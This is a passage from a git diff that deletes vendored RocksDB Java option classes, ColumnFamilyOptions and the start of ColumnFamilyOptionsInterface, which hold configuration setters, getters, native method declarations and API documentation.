-      final AbstractComparator<? extends AbstractSlice<?>> comparator) {
-    assert (isOwningHandle());
-    setComparatorHandle(nativeHandle_, comparator.getNativeHandle());
-    comparator_ = comparator;
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions setMergeOperatorName(final String name) {
-    assert (isOwningHandle());
-    if (name == null) {
-      throw new IllegalArgumentException(
-          "Merge operator name must not be null.");
-    }
-    setMergeOperatorName(nativeHandle_, name);
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions setMergeOperator(
-      final MergeOperator mergeOperator) {
-    setMergeOperator(nativeHandle_, mergeOperator.nativeHandle_);
-    return this;
-  }
-
-  public ColumnFamilyOptions setCompactionFilter(
-        final AbstractCompactionFilter<? extends AbstractSlice<?>>
-            compactionFilter) {
-    setCompactionFilterHandle(nativeHandle_, compactionFilter.nativeHandle_);
-    compactionFilter_ = compactionFilter;
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions setWriteBufferSize(final long writeBufferSize) {
-    assert(isOwningHandle());
-    setWriteBufferSize(nativeHandle_, writeBufferSize);
-    return this;
-  }
-
-  @Override
-  public long writeBufferSize()  {
-    assert(isOwningHandle());
-    return writeBufferSize(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setMaxWriteBufferNumber(
-      final int maxWriteBufferNumber) {
-    assert(isOwningHandle());
-    setMaxWriteBufferNumber(nativeHandle_, maxWriteBufferNumber);
-    return this;
-  }
-
-  @Override
-  public int maxWriteBufferNumber() {
-    assert(isOwningHandle());
-    return maxWriteBufferNumber(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setMinWriteBufferNumberToMerge(
-      final int minWriteBufferNumberToMerge) {
-    setMinWriteBufferNumberToMerge(nativeHandle_, minWriteBufferNumberToMerge);
-    return this;
-  }
-
-  @Override
-  public int minWriteBufferNumberToMerge() {
-    return minWriteBufferNumberToMerge(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions useFixedLengthPrefixExtractor(final int n) {
-    assert(isOwningHandle());
-    useFixedLengthPrefixExtractor(nativeHandle_, n);
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions useCappedPrefixExtractor(final int n) {
-    assert(isOwningHandle());
-    useCappedPrefixExtractor(nativeHandle_, n);
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions setCompressionType(
-      final CompressionType compressionType) {
-    setCompressionType(nativeHandle_, compressionType.getValue());
-    return this;
-  }
-
-  @Override
-  public CompressionType compressionType() {
-    return CompressionType.getCompressionType(compressionType(nativeHandle_));
-  }
-
-  @Override
-  public ColumnFamilyOptions setCompressionPerLevel(
-      final List<CompressionType> compressionLevels) {
-    final byte[] byteCompressionTypes = new byte[
-        compressionLevels.size()];
-    for (int i = 0; i < compressionLevels.size(); i++) {
-      byteCompressionTypes[i] = compressionLevels.get(i).getValue();
-    }
-    setCompressionPerLevel(nativeHandle_, byteCompressionTypes);
-    return this;
-  }
-
-  @Override
-  public List<CompressionType> compressionPerLevel() {
-    final byte[] byteCompressionTypes =
-        compressionPerLevel(nativeHandle_);
-    final List<CompressionType> compressionLevels = new ArrayList<>();
-    for (final Byte byteCompressionType : byteCompressionTypes) {
-      compressionLevels.add(CompressionType.getCompressionType(
-          byteCompressionType));
-    }
-    return compressionLevels;
-  }
-
-  @Override
-  public ColumnFamilyOptions setBottommostCompressionType(
-      final CompressionType bottommostCompressionType) {
-    setBottommostCompressionType(nativeHandle_,
-        bottommostCompressionType.getValue());
-    return this;
-  }
-
-  @Override
-  public CompressionType bottommostCompressionType() {
-    return CompressionType.getCompressionType(
-        bottommostCompressionType(nativeHandle_));
-  }
-
-  @Override
-  public ColumnFamilyOptions setCompressionOptions(
-      final CompressionOptions compressionOptions) {
-    setCompressionOptions(nativeHandle_, compressionOptions.nativeHandle_);
-    this.compressionOptions_ = compressionOptions;
-    return this;
-  }
-
-  @Override
-  public CompressionOptions compressionOptions() {
-    return this.compressionOptions_;
-  }
-
-  @Override
-  public ColumnFamilyOptions setNumLevels(final int numLevels) {
-    setNumLevels(nativeHandle_, numLevels);
-    return this;
-  }
-
-  @Override
-  public int numLevels() {
-    return numLevels(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setLevelZeroFileNumCompactionTrigger(
-      final int numFiles) {
-    setLevelZeroFileNumCompactionTrigger(
-        nativeHandle_, numFiles);
-    return this;
-  }
-
-  @Override
-  public int levelZeroFileNumCompactionTrigger() {
-    return levelZeroFileNumCompactionTrigger(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setLevelZeroSlowdownWritesTrigger(
-      final int numFiles) {
-    setLevelZeroSlowdownWritesTrigger(nativeHandle_, numFiles);
-    return this;
-  }
-
-  @Override
-  public int levelZeroSlowdownWritesTrigger() {
-    return levelZeroSlowdownWritesTrigger(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setLevelZeroStopWritesTrigger(final int numFiles) {
-    setLevelZeroStopWritesTrigger(nativeHandle_, numFiles);
-    return this;
-  }
-
-  @Override
-  public int levelZeroStopWritesTrigger() {
-    return levelZeroStopWritesTrigger(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setTargetFileSizeBase(
-      final long targetFileSizeBase) {
-    setTargetFileSizeBase(nativeHandle_, targetFileSizeBase);
-    return this;
-  }
-
-  @Override
-  public long targetFileSizeBase() {
-    return targetFileSizeBase(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setTargetFileSizeMultiplier(
-      final int multiplier) {
-    setTargetFileSizeMultiplier(nativeHandle_, multiplier);
-    return this;
-  }
-
-  @Override
-  public int targetFileSizeMultiplier() {
-    return targetFileSizeMultiplier(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setMaxBytesForLevelBase(
-      final long maxBytesForLevelBase) {
-    setMaxBytesForLevelBase(nativeHandle_, maxBytesForLevelBase);
-    return this;
-  }
-
-  @Override
-  public long maxBytesForLevelBase() {
-    return maxBytesForLevelBase(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setLevelCompactionDynamicLevelBytes(
-      final boolean enableLevelCompactionDynamicLevelBytes) {
-    setLevelCompactionDynamicLevelBytes(nativeHandle_,
-        enableLevelCompactionDynamicLevelBytes);
-    return this;
-  }
-
-  @Override
-  public boolean levelCompactionDynamicLevelBytes() {
-    return levelCompactionDynamicLevelBytes(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setMaxBytesForLevelMultiplier(final double multiplier) {
-    setMaxBytesForLevelMultiplier(nativeHandle_, multiplier);
-    return this;
-  }
-
-  @Override
-  public double maxBytesForLevelMultiplier() {
-    return maxBytesForLevelMultiplier(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setMaxCompactionBytes(final long maxCompactionBytes) {
-    setMaxCompactionBytes(nativeHandle_, maxCompactionBytes);
-    return this;
-  }
-
-  @Override
-  public long maxCompactionBytes() {
-    return maxCompactionBytes(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setArenaBlockSize(
-      final long arenaBlockSize) {
-    setArenaBlockSize(nativeHandle_, arenaBlockSize);
-    return this;
-  }
-
-  @Override
-  public long arenaBlockSize() {
-    return arenaBlockSize(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setDisableAutoCompactions(
-      final boolean disableAutoCompactions) {
-    setDisableAutoCompactions(nativeHandle_, disableAutoCompactions);
-    return this;
-  }
-
-  @Override
-  public boolean disableAutoCompactions() {
-    return disableAutoCompactions(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setCompactionStyle(
-      final CompactionStyle compactionStyle) {
-    setCompactionStyle(nativeHandle_, compactionStyle.getValue());
-    return this;
-  }
-
-  @Override
-  public CompactionStyle compactionStyle() {
-    return CompactionStyle.values()[compactionStyle(nativeHandle_)];
-  }
-
-  @Override
-  public ColumnFamilyOptions setMaxTableFilesSizeFIFO(
-      final long maxTableFilesSize) {
-    assert(maxTableFilesSize > 0); // unsigned native type
-    assert(isOwningHandle());
-    setMaxTableFilesSizeFIFO(nativeHandle_, maxTableFilesSize);
-    return this;
-  }
-
-  @Override
-  public long maxTableFilesSizeFIFO() {
-    return maxTableFilesSizeFIFO(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setMaxSequentialSkipInIterations(
-      final long maxSequentialSkipInIterations) {
-    setMaxSequentialSkipInIterations(nativeHandle_,
-        maxSequentialSkipInIterations);
-    return this;
-  }
-
-  @Override
-  public long maxSequentialSkipInIterations() {
-    return maxSequentialSkipInIterations(nativeHandle_);
-  }
-
-  @Override
-  public MemTableConfig memTableConfig() {
-    return this.memTableConfig_;
-  }
-
-  @Override
-  public ColumnFamilyOptions setMemTableConfig(
-      final MemTableConfig memTableConfig) {
-    setMemTableFactory(
-        nativeHandle_, memTableConfig.newMemTableFactoryHandle());
-    this.memTableConfig_ = memTableConfig;
-    return this;
-  }
-
-  @Override
-  public String memTableFactoryName() {
-    assert(isOwningHandle());
-    return memTableFactoryName(nativeHandle_);
-  }
-
-  @Override
-  public TableFormatConfig tableFormatConfig() {
-    return this.tableFormatConfig_;
-  }
-
-  @Override
-  public ColumnFamilyOptions setTableFormatConfig(
-      final TableFormatConfig tableFormatConfig) {
-    setTableFactory(nativeHandle_, tableFormatConfig.newTableFactoryHandle());
-    this.tableFormatConfig_ = tableFormatConfig;
-    return this;
-  }
-
-  @Override
-  public String tableFactoryName() {
-    assert(isOwningHandle());
-    return tableFactoryName(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setInplaceUpdateSupport(
-      final boolean inplaceUpdateSupport) {
-    setInplaceUpdateSupport(nativeHandle_, inplaceUpdateSupport);
-    return this;
-  }
-
-  @Override
-  public boolean inplaceUpdateSupport() {
-    return inplaceUpdateSupport(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setInplaceUpdateNumLocks(
-      final long inplaceUpdateNumLocks) {
-    setInplaceUpdateNumLocks(nativeHandle_, inplaceUpdateNumLocks);
-    return this;
-  }
-
-  @Override
-  public long inplaceUpdateNumLocks() {
-    return inplaceUpdateNumLocks(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setMemtablePrefixBloomSizeRatio(
-      final double memtablePrefixBloomSizeRatio) {
-    setMemtablePrefixBloomSizeRatio(nativeHandle_, memtablePrefixBloomSizeRatio);
-    return this;
-  }
-
-  @Override
-  public double memtablePrefixBloomSizeRatio() {
-    return memtablePrefixBloomSizeRatio(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setBloomLocality(int bloomLocality) {
-    setBloomLocality(nativeHandle_, bloomLocality);
-    return this;
-  }
-
-  @Override
-  public int bloomLocality() {
-    return bloomLocality(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setMaxSuccessiveMerges(
-      final long maxSuccessiveMerges) {
-    setMaxSuccessiveMerges(nativeHandle_, maxSuccessiveMerges);
-    return this;
-  }
-
-  @Override
-  public long maxSuccessiveMerges() {
-    return maxSuccessiveMerges(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setOptimizeFiltersForHits(
-      final boolean optimizeFiltersForHits) {
-    setOptimizeFiltersForHits(nativeHandle_, optimizeFiltersForHits);
-    return this;
-  }
-
-  @Override
-  public boolean optimizeFiltersForHits() {
-    return optimizeFiltersForHits(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions
-  setMemtableHugePageSize(
-      long memtableHugePageSize) {
-    setMemtableHugePageSize(nativeHandle_,
-        memtableHugePageSize);
-    return this;
-  }
-
-  @Override
-  public long memtableHugePageSize() {
-    return memtableHugePageSize(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setSoftPendingCompactionBytesLimit(long softPendingCompactionBytesLimit) {
-    setSoftPendingCompactionBytesLimit(nativeHandle_,
-        softPendingCompactionBytesLimit);
-    return this;
-  }
-
-  @Override
-  public long softPendingCompactionBytesLimit() {
-    return softPendingCompactionBytesLimit(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setHardPendingCompactionBytesLimit(long hardPendingCompactionBytesLimit) {
-    setHardPendingCompactionBytesLimit(nativeHandle_, hardPendingCompactionBytesLimit);
-    return this;
-  }
-
-  @Override
-  public long hardPendingCompactionBytesLimit() {
-    return hardPendingCompactionBytesLimit(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setLevel0FileNumCompactionTrigger(int level0FileNumCompactionTrigger) {
-    setLevel0FileNumCompactionTrigger(nativeHandle_, level0FileNumCompactionTrigger);
-    return this;
-  }
-
-  @Override
-  public int level0FileNumCompactionTrigger() {
-    return level0FileNumCompactionTrigger(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setLevel0SlowdownWritesTrigger(int level0SlowdownWritesTrigger) {
-    setLevel0SlowdownWritesTrigger(nativeHandle_, level0SlowdownWritesTrigger);
-    return this;
-  }
-
-  @Override
-  public int level0SlowdownWritesTrigger() {
-    return level0SlowdownWritesTrigger(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setLevel0StopWritesTrigger(int level0StopWritesTrigger) {
-    setLevel0StopWritesTrigger(nativeHandle_, level0StopWritesTrigger);
-    return this;
-  }
-
-  @Override
-  public int level0StopWritesTrigger() {
-    return level0StopWritesTrigger(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setMaxBytesForLevelMultiplierAdditional(int[] maxBytesForLevelMultiplierAdditional) {
-    setMaxBytesForLevelMultiplierAdditional(nativeHandle_, maxBytesForLevelMultiplierAdditional);
-    return this;
-  }
-
-  @Override
-  public int[] maxBytesForLevelMultiplierAdditional() {
-    return maxBytesForLevelMultiplierAdditional(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setParanoidFileChecks(boolean paranoidFileChecks) {
-    setParanoidFileChecks(nativeHandle_, paranoidFileChecks);
-    return this;
-  }
-
-  @Override
-  public boolean paranoidFileChecks() {
-    return paranoidFileChecks(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setMaxWriteBufferNumberToMaintain(
-      final int maxWriteBufferNumberToMaintain) {
-    setMaxWriteBufferNumberToMaintain(
-        nativeHandle_, maxWriteBufferNumberToMaintain);
-    return this;
-  }
-
-  @Override
-  public int maxWriteBufferNumberToMaintain() {
-    return maxWriteBufferNumberToMaintain(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setCompactionPriority(
-      final CompactionPriority compactionPriority) {
-    setCompactionPriority(nativeHandle_, compactionPriority.getValue());
-    return this;
-  }
-
-  @Override
-  public CompactionPriority compactionPriority() {
-    return CompactionPriority.getCompactionPriority(
-        compactionPriority(nativeHandle_));
-  }
-
-  @Override
-  public ColumnFamilyOptions setReportBgIoStats(final boolean reportBgIoStats) {
-    setReportBgIoStats(nativeHandle_, reportBgIoStats);
-    return this;
-  }
-
-  @Override
-  public boolean reportBgIoStats() {
-    return reportBgIoStats(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setCompactionOptionsUniversal(
-      final CompactionOptionsUniversal compactionOptionsUniversal) {
-    setCompactionOptionsUniversal(nativeHandle_,
-        compactionOptionsUniversal.nativeHandle_);
-    this.compactionOptionsUniversal_ = compactionOptionsUniversal;
-    return this;
-  }
-
-  @Override
-  public CompactionOptionsUniversal compactionOptionsUniversal() {
-    return this.compactionOptionsUniversal_;
-  }
-
-  @Override
-  public ColumnFamilyOptions setCompactionOptionsFIFO(final CompactionOptionsFIFO compactionOptionsFIFO) {
-    setCompactionOptionsFIFO(nativeHandle_,
-        compactionOptionsFIFO.nativeHandle_);
-    this.compactionOptionsFIFO_ = compactionOptionsFIFO;
-    return this;
-  }
-
-  @Override
-  public CompactionOptionsFIFO compactionOptionsFIFO() {
-    return this.compactionOptionsFIFO_;
-  }
-
-  @Override
-  public ColumnFamilyOptions setForceConsistencyChecks(final boolean forceConsistencyChecks) {
-    setForceConsistencyChecks(nativeHandle_, forceConsistencyChecks);
-    return this;
-  }
-
-  @Override
-  public boolean forceConsistencyChecks() {
-    return forceConsistencyChecks(nativeHandle_);
-  }
-
-  /**
-   * <p>Private constructor to be used by
-   * {@link #getColumnFamilyOptionsFromProps(java.util.Properties)}</p>
-   *
-   * @param handle native handle to ColumnFamilyOptions instance.
-   */
-  private ColumnFamilyOptions(final long handle) {
-    super(handle);
-  }
-
-  private static native long getColumnFamilyOptionsFromProps(
-      String optString);
-
-  private static native long newColumnFamilyOptions();
-  @Override protected final native void disposeInternal(final long handle);
-
-  private native void optimizeForSmallDb(final long handle);
-  private native void optimizeForPointLookup(long handle,
-      long blockCacheSizeMb);
-  private native void optimizeLevelStyleCompaction(long handle,
-      long memtableMemoryBudget);
-  private native void optimizeUniversalStyleCompaction(long handle,
-      long memtableMemoryBudget);
-  private native void setComparatorHandle(long handle, int builtinComparator);
-  private native void setComparatorHandle(long optHandle,
-      long comparatorHandle);
-  private native void setMergeOperatorName(long handle, String name);
-  private native void setMergeOperator(long handle, long mergeOperatorHandle);
-  private native void setCompactionFilterHandle(long handle,
-      long compactionFilterHandle);
-  private native void setWriteBufferSize(long handle, long writeBufferSize)
-      throws IllegalArgumentException;
-  private native long writeBufferSize(long handle);
-  private native void setMaxWriteBufferNumber(
-      long handle, int maxWriteBufferNumber);
-  private native int maxWriteBufferNumber(long handle);
-  private native void setMinWriteBufferNumberToMerge(
-      long handle, int minWriteBufferNumberToMerge);
-  private native int minWriteBufferNumberToMerge(long handle);
-  private native void setCompressionType(long handle, byte compressionType);
-  private native byte compressionType(long handle);
-  private native void setCompressionPerLevel(long handle,
-      byte[] compressionLevels);
-  private native byte[] compressionPerLevel(long handle);
-  private native void setBottommostCompressionType(long handle,
-      byte bottommostCompressionType);
-  private native byte bottommostCompressionType(long handle);
-  private native void setCompressionOptions(long handle,
-      long compressionOptionsHandle);
-  private native void useFixedLengthPrefixExtractor(
-      long handle, int prefixLength);
-  private native void useCappedPrefixExtractor(
-      long handle, int prefixLength);
-  private native void setNumLevels(
-      long handle, int numLevels);
-  private native int numLevels(long handle);
-  private native void setLevelZeroFileNumCompactionTrigger(
-      long handle, int numFiles);
-  private native int levelZeroFileNumCompactionTrigger(long handle);
-  private native void setLevelZeroSlowdownWritesTrigger(
-      long handle, int numFiles);
-  private native int levelZeroSlowdownWritesTrigger(long handle);
-  private native void setLevelZeroStopWritesTrigger(
-      long handle, int numFiles);
-  private native int levelZeroStopWritesTrigger(long handle);
-  private native void setTargetFileSizeBase(
-      long handle, long targetFileSizeBase);
-  private native long targetFileSizeBase(long handle);
-  private native void setTargetFileSizeMultiplier(
-      long handle, int multiplier);
-  private native int targetFileSizeMultiplier(long handle);
-  private native void setMaxBytesForLevelBase(
-      long handle, long maxBytesForLevelBase);
-  private native long maxBytesForLevelBase(long handle);
-  private native void setLevelCompactionDynamicLevelBytes(
-      long handle, boolean enableLevelCompactionDynamicLevelBytes);
-  private native boolean levelCompactionDynamicLevelBytes(
-      long handle);
-  private native void setMaxBytesForLevelMultiplier(long handle, double multiplier);
-  private native double maxBytesForLevelMultiplier(long handle);
-  private native void setMaxCompactionBytes(long handle, long maxCompactionBytes);
-  private native long maxCompactionBytes(long handle);
-  private native void setArenaBlockSize(
-      long handle, long arenaBlockSize)
-      throws IllegalArgumentException;
-  private native long arenaBlockSize(long handle);
-  private native void setDisableAutoCompactions(
-      long handle, boolean disableAutoCompactions);
-  private native boolean disableAutoCompactions(long handle);
-  private native void setCompactionStyle(long handle, byte compactionStyle);
-  private native byte compactionStyle(long handle);
-   private native void setMaxTableFilesSizeFIFO(
-      long handle, long max_table_files_size);
-  private native long maxTableFilesSizeFIFO(long handle);
-  private native void setMaxSequentialSkipInIterations(
-      long handle, long maxSequentialSkipInIterations);
-  private native long maxSequentialSkipInIterations(long handle);
-  private native void setMemTableFactory(long handle, long factoryHandle);
-  private native String memTableFactoryName(long handle);
-  private native void setTableFactory(long handle, long factoryHandle);
-  private native String tableFactoryName(long handle);
-  private native void setInplaceUpdateSupport(
-      long handle, boolean inplaceUpdateSupport);
-  private native boolean inplaceUpdateSupport(long handle);
-  private native void setInplaceUpdateNumLocks(
-      long handle, long inplaceUpdateNumLocks)
-      throws IllegalArgumentException;
-  private native long inplaceUpdateNumLocks(long handle);
-  private native void setMemtablePrefixBloomSizeRatio(
-      long handle, double memtablePrefixBloomSizeRatio);
-  private native double memtablePrefixBloomSizeRatio(long handle);
-  private native void setBloomLocality(
-      long handle, int bloomLocality);
-  private native int bloomLocality(long handle);
-  private native void setMaxSuccessiveMerges(
-      long handle, long maxSuccessiveMerges)
-      throws IllegalArgumentException;
-  private native long maxSuccessiveMerges(long handle);
-  private native void setOptimizeFiltersForHits(long handle,
-      boolean optimizeFiltersForHits);
-  private native boolean optimizeFiltersForHits(long handle);
-  private native void setMemtableHugePageSize(long handle,
-      long memtableHugePageSize);
-  private native long memtableHugePageSize(long handle);
-  private native void setSoftPendingCompactionBytesLimit(long handle,
-      long softPendingCompactionBytesLimit);
-  private native long softPendingCompactionBytesLimit(long handle);
-  private native void setHardPendingCompactionBytesLimit(long handle,
-      long hardPendingCompactionBytesLimit);
-  private native long hardPendingCompactionBytesLimit(long handle);
-  private native void setLevel0FileNumCompactionTrigger(long handle,
-      int level0FileNumCompactionTrigger);
-  private native int level0FileNumCompactionTrigger(long handle);
-  private native void setLevel0SlowdownWritesTrigger(long handle,
-      int level0SlowdownWritesTrigger);
-  private native int level0SlowdownWritesTrigger(long handle);
-  private native void setLevel0StopWritesTrigger(long handle,
-      int level0StopWritesTrigger);
-  private native int level0StopWritesTrigger(long handle);
-  private native void setMaxBytesForLevelMultiplierAdditional(long handle,
-      int[] maxBytesForLevelMultiplierAdditional);
-  private native int[] maxBytesForLevelMultiplierAdditional(long handle);
-  private native void setParanoidFileChecks(long handle,
-      boolean paranoidFileChecks);
-  private native boolean paranoidFileChecks(long handle);
-  private native void setMaxWriteBufferNumberToMaintain(final long handle,
-      final int maxWriteBufferNumberToMaintain);
-  private native int maxWriteBufferNumberToMaintain(final long handle);
-  private native void setCompactionPriority(final long handle,
-      final byte compactionPriority);
-  private native byte compactionPriority(final long handle);
-  private native void setReportBgIoStats(final long handle,
-    final boolean reportBgIoStats);
-  private native boolean reportBgIoStats(final long handle);
-  private native void setCompactionOptionsUniversal(final long handle,
-    final long compactionOptionsUniversalHandle);
-  private native void setCompactionOptionsFIFO(final long handle,
-    final long compactionOptionsFIFOHandle);
-  private native void setForceConsistencyChecks(final long handle,
-    final boolean forceConsistencyChecks);
-  private native boolean forceConsistencyChecks(final long handle);
-
-  // instance variables
-  private MemTableConfig memTableConfig_;
-  private TableFormatConfig tableFormatConfig_;
-  private AbstractComparator<? extends AbstractSlice<?>> comparator_;
-  private AbstractCompactionFilter<? extends AbstractSlice<?>> compactionFilter_;
-  private CompactionOptionsUniversal compactionOptionsUniversal_;
-  private CompactionOptionsFIFO compactionOptionsFIFO_;
-  private CompressionOptions compressionOptions_;
-
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyOptionsInterface.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyOptionsInterface.java
deleted file mode 100644
index 5cb68b4..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyOptionsInterface.java
+++ /dev/null
@@ -1,375 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-public interface ColumnFamilyOptionsInterface
-    <T extends ColumnFamilyOptionsInterface>
-        extends AdvancedColumnFamilyOptionsInterface<T> {
-
-  /**
-   * Use this if your DB is very small (like under 1GB) and you don't want to
-   * spend lots of memory for memtables.
-   *
-   * @return the instance of the current object.
-   */
-  T optimizeForSmallDb();
-
-  /**
-   * Use this if you don't need to keep the data sorted, i.e. you'll never use
-   * an iterator, only Put() and Get() API calls
-   *
-   * @param blockCacheSizeMb Block cache size in MB
-   * @return the instance of the current object.
-   */
-  T optimizeForPointLookup(long blockCacheSizeMb);
-
-  /**
-   * <p>Default values for some parameters in ColumnFamilyOptions are not
-   * optimized for heavy workloads and big datasets, which means you might
-   * observe write stalls under some conditions. As a starting point for tuning
-   * RocksDB options, use the following for level style compaction.</p>
-   *
-   * <p>Make sure to also call IncreaseParallelism(), which will provide the
-   * biggest performance gains.</p>
-   * <p>Note: we might use more memory than memtable_memory_budget during high
-   * write rate period</p>
-   *
-   * @return the instance of the current object.
-   */
-  T optimizeLevelStyleCompaction();
-
-  /**
-   * <p>Default values for some parameters in ColumnFamilyOptions are not
-   * optimized for heavy workloads and big datasets, which means you might
-   * observe write stalls under some conditions. As a starting point for tuning
-   * RocksDB options, use the following for level style compaction.</p>
-   *
-   * <p>Make sure to also call IncreaseParallelism(), which will provide the
-   * biggest performance gains.</p>
-   * <p>Note: we might use more memory than memtable_memory_budget during high
-   * write rate period</p>
-   *
-   * @param memtableMemoryBudget memory budget in bytes
-   * @return the instance of the current object.
-   */
-  T optimizeLevelStyleCompaction(
-      long memtableMemoryBudget);
-
-  /**
-   * <p>Default values for some parameters in ColumnFamilyOptions are not
-   * optimized for heavy workloads and big datasets, which means you might
-   * observe write stalls under some conditions. As a starting point for tuning
-   * RocksDB options, use the following for universal style compaction.</p>
-   *
-   * <p>Universal style compaction is focused on reducing Write Amplification
-   * Factor for big data sets, but increases Space Amplification.</p>
-   *
-   * <p>Make sure to also call IncreaseParallelism(), which will provide the
-   * biggest performance gains.</p>
-   *
-   * <p>Note: we might use more memory than memtable_memory_budget during high
-   * write rate period</p>
-   *
-   * @return the instance of the current object.
-   */
-  T optimizeUniversalStyleCompaction();
-
-  /**
-   * <p>Default values for some parameters in ColumnFamilyOptions are not
-   * optimized for heavy workloads and big datasets, which means you might
-   * observe write stalls under some conditions. As a starting point for tuning
-   * RocksDB options, use the following for universal style compaction.</p>
-   *
-   * <p>Universal style compaction is focused on reducing Write Amplification
-   * Factor for big data sets, but increases Space Amplification.</p>
-   *
-   * <p>Make sure to also call IncreaseParallelism(), which will provide the
-   * biggest performance gains.</p>
-   *
-   * <p>Note: we might use more memory than memtable_memory_budget during high
-   * write rate period</p>
-   *
-   * @param memtableMemoryBudget memory budget in bytes
-   * @return the instance of the current object.
-   */
-  T optimizeUniversalStyleCompaction(
-      long memtableMemoryBudget);
-
-  /**
-   * Set {@link BuiltinComparator} to be used with RocksDB.
-   *
-   * Note: Comparator can be set once upon database creation.
-   *
-   * Default: BytewiseComparator.
-   * @param builtinComparator a {@link BuiltinComparator} type.
-   * @return the instance of the current object.
-   */
-  T setComparator(
-      BuiltinComparator builtinComparator);
-
-  /**
-   * Use the specified comparator for key ordering.
-   *
-   * Comparator should not be disposed before options instances using this comparator is
-   * disposed. If dispose() function is not called, then comparator object will be
-   * GC'd automatically.
-   *
-   * Comparator instance can be re-used in multiple options instances.
-   *
-   * @param comparator java instance.
-   * @return the instance of the current object.
-   */
-  T setComparator(
-      AbstractComparator<? extends AbstractSlice<?>> comparator);
-
-  /**
-   * <p>Set the merge operator to be used for merging two merge operands
-   * of the same key. The merge function is invoked during
-   * compaction and at lookup time, if multiple key/value pairs belonging
-   * to the same key are found in the database.</p>
-   *
-   * @param name the name of the merge function, as defined by
-   * the MergeOperators factory (see utilities/MergeOperators.h)
-   * The merge function is specified by name and must be one of the
-   * standard merge operators provided by RocksDB. The available
-   * operators are "put", "uint64add", "stringappend" and "stringappendtest".
-   * @return the instance of the current object.
-   */
-  T setMergeOperatorName(String name);
-
-  /**
-   * <p>Set the merge operator to be used for merging two different key/value
-   * pairs that share the same key. The merge function is invoked during
-   * compaction and at lookup time, if multiple key/value pairs belonging
-   * to the same key are found in the database.</p>
-   *
-   * @param mergeOperator {@link MergeOperator} instance.
-   * @return the instance of the current object.
-   */
-  T setMergeOperator(MergeOperator mergeOperator);
-
-  /**
-   * This prefix-extractor uses the first n bytes of a key as its prefix.
-   *
-   * In some hash-based memtable representation such as HashLinkedList
-   * and HashSkipList, prefixes are used to partition the keys into
-   * several buckets.  Prefix extractor is used to specify how to
-   * extract the prefix given a key.
-   *
-   * @param n use the first n bytes of a key as its prefix.
-   * @return the reference to the current option.
-   */
-  T useFixedLengthPrefixExtractor(int n);
-
-  /**
-   * Same as fixed length prefix extractor, except that when slice is
-   * shorter than the fixed length, it will use the full key.
-   *
-   * @param n use the first n bytes of a key as its prefix.
-   * @return the reference to the current option.
-   */
-  T useCappedPrefixExtractor(int n);
-
-  /**
-   * Number of files to trigger level-0 compaction. A value &lt; 0 means that
-   * level-0 compaction will not be triggered by number of files at all.
-   * Default: 4
-   *
-   * @param numFiles the number of files in level-0 to trigger compaction.
-   * @return the reference to the current option.
-   */
-  T setLevelZeroFileNumCompactionTrigger(
-      int numFiles);
-
-  /**
-   * The number of files in level 0 to trigger compaction from level-0 to
-   * level-1.  A value &lt; 0 means that level-0 compaction will not be
-   * triggered by number of files at all.
-   * Default: 4
-   *
-   * @return the number of files in level 0 to trigger compaction.
-   */
-  int levelZeroFileNumCompactionTrigger();
-
-  /**
-   * Soft limit on number of level-0 files. We start slowing down writes at this
-   * point. A value &lt; 0 means that no writing slow down will be triggered by
-   * number of files in level-0.
-   *
-   * @param numFiles soft limit on number of level-0 files.
-   * @return the reference to the current option.
-   */
-  T setLevelZeroSlowdownWritesTrigger(
-      int numFiles);
-
-  /**
-   * Soft limit on the number of level-0 files. We start slowing down writes
-   * at this point. A value &lt; 0 means that no writing slow down will be
-   * triggered by number of files in level-0.
